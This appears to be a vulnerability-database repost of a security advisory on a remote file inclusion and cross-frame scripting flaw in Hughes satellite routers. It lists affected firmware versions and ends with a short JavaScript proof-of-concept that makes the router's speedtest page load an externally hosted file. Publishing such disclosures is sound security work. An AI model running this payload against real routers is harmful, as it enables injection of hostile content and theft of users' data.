Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Hughes Satellite Router Remote File Inclusion Cross Frame Scripting

🗓️ 29 Dec 2022 00:00:00Reported by LiquidWorm, zeroscience.mkType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 269 Views

Hughes Satellite Router RFI/XFS PoC Exploit by lqwrm 2022. Cross-frame scripting vulnerability in Hughes Network Systems routers

Code
`  
Hughes Satellite Router Remote File Inclusion Cross-Frame Scripting  
  
  
Vendor: Hughes Network Systems, LLC  
Product web page: https://www.hughes.com  
Affected version: HX200 v8.3.1.14  
HX90 v6.11.0.5  
HX50L v6.10.0.18  
HN9460 v8.2.0.48  
HN7000S v6.9.0.37  
  
Summary: The HX200 is a high-performance satellite router designed to  
provide carrier-grade IP services using dynamically assigned high-bandwidth  
satellite IP connectivity. The HX200 satellite router provides flexible  
Quality of Service (QoS) features that can be tailored to the network  
applications at each individual remote router, such as Adaptive Constant  
Bit Rate (CBR) bandwidth assignment to deliver high-quality, low jitter  
bandwidth for real-time traffic such as Voice over IP (VoIP) or videoconferencing.  
With integrated IP features including RIPv1, RIPv2, BGP, DHCP, NAT/PAT,  
and DNS Server/Relay functionality, together with a high-performance  
satellite modem, the HX200 is a full-featured IP Router with an integrated  
high-performance satellite router. The HX200 enables high- performance  
IP connectivity for a variety of applications including cellular backhaul,  
MPLS extension services, virtual leased line, mobile services and other  
high-bandwidth solutions.  
  
Desc: The router contains a cross-frame scripting via remote file inclusion  
vulnerability that may potentially be exploited by malicious users to compromise  
an affected system. This vulnerability may allow an unauthenticated malicious  
user to misuse frames, include JS/HTML code and steal sensitive information  
from legitimate users of the application.  
  
Tested on: WindWeb/1.0  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2022-5743  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5743.php  
  
  
23.12.2022  
  
--  
  
  
snippet:///XFSRFI  
//  
// Hughes Satellite Router RFI/XFS PoC Exploit  
// by lqwrm 2022  
//  
  
//URL http://TARGET/fs/dynaform/speedtest.html  
//Reload target  
//window.location.reload()  
  
console.log("Loading Broadband Satellite Browsing Test");  
  
//Add cross-frame file include (http only)  
AddURLtoList("http://www.zeroscience.mk/pentest/XSS.svg");  
  
console.log("Calling StartTest()");  
StartTest()  
  
//console.log("Calling DoTest()");  
//DoTest()  
  
//Unload weapon  
//document.getElementById("URLList").remove();  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
29 Dec 2022 00:00Current
0.2Low risk
Vulners AI Score0.2
file inclusioncross-frame scriptingrouter vulnerabilityremote exploitrfi/xfs pocxss detectionsecurity advisory
269